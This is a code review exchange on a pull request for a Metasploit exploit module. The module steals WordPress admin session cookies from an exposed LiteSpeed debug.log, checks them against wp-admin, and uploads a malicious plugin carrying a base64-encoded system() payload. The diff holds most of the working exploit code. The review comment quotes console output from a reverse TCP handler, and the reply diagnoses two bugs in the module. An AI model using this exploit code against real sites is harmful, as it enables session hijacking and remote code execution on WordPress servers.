modules/exploits/multi/http/wp_litespeed_cookie_theft.rb

```diff
@@ -0,0 +1,182 @@
+              'Arch' => ARCH_CMD
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-09-04',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+  end
+
+  def check
+    @admin_cookie = get_valid_admin_cookie
+    CheckCode::Vulnerable('Found and tested valid admin cookie, we can upload and execute a payload')
+  rescue WordPressNotOnline => e
+    return CheckCode::Unknown("This doesn't appear to be a WordPress site: #{e.class}, #{e}")
+  rescue DebugLogError => e
+    return CheckCode::Safe("#{e.class}, #{e}")
+  rescue AdminCookieError => e
+    return CheckCode::Safe("#{e.class}, #{e}")
+  end
+
+  def extract_cookies(debug_log)
+    admin_cookies = []
+    debug_log.each_line do |log_line|
+      match = log_line.match(/Cookie: (wordpress_logged_in_[^=]+=[^;]+).*(wordpress_[^=]+=[^;]+)|(wordpress_[^=]+=[^;]+).*(wordpress_logged_in_[^=]+=[^;]+)/)
+      admin_cookies << match.captures.compact.join('; ') if match
+    end
+    admin_cookies
+  end
+
+  def verify_admin_cookie(admin_cookies)
+    admin_cookies.each do |admin_cookie|
+      res = send_request_cgi({
+        'uri' => '/wp-admin/',
+        'cookie' => admin_cookie
+      })
+      if res&.code == 200
+        return admin_cookie
+      end
+    end
+
+    nil
+  end
+
+  def generate_plugin(plugin_name, payload_name)
+    plugin_script = %(<?php
+/**
+ * Plugin Name: #{plugin_name}
+ * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
+ * Author: #{Rex::Text.rand_text_alpha(10)}
+ * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
+ * License: GPL2
+ */
+?>)
+
+    php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
+    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
+    zip.add_file("#{plugin_name}/#{payload_name}.php", php_code)
+    zip
+  end
+
+  def get_valid_admin_cookie
+    raise WordPressNotOnline unless wordpress_and_online?
+
+    res = send_request_cgi({
+      'uri' => '/wp-content/debug.log',
+      'method' => 'GET'
+    })
+    raise DebugLogError, 'There was no /wp-content/debug.log endpoint found on the target to pillage' unless res&.code == 200
+    raise DebugLogError, 'There were no cookies found inside /wp-content/debug.log' unless res.body.include?('wordpress_logged_in')
+
+    admin_cookies = extract_cookies(res.body)
+    raise AdminCookieError 'No admin cookies could be found in debug.log' unless admin_cookies
+
+    print_status('One or more potential admin cookies were found')
+
+    admin_cookie = verify_admin_cookie(admin_cookies)
+    raise AdminCookieError, 'Admin cookies were found but are invalid' unless admin_cookie
```

Comment:
Also here, seems is not catching the "No admin cookies could be found" even if the array is empty.
```
msf6 exploit(multi/http/wp_litespeed_cookie_theft) > exploit

[*] Started reverse TCP handler on 172.18.52.45:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] 0
[+] 0
[*] One or more potential admin cookies were found
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Msf::Modules::Exploit__Multi__Http__Wp_litespeed_cookie_theft::MetasploitModule::AdminCookieError, Admin cookies were found but are invalid "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_litespeed_cookie_theft) > 

```

Reply:
Thanks @dledda-r7 great catch. Two things wrong here:

1. There needs to be a comma in between the Error type and the message parameter being sent `raise AdminCookieError 'No admin cookies`
2. And as you mentioned, the empty array is non-nil, oops!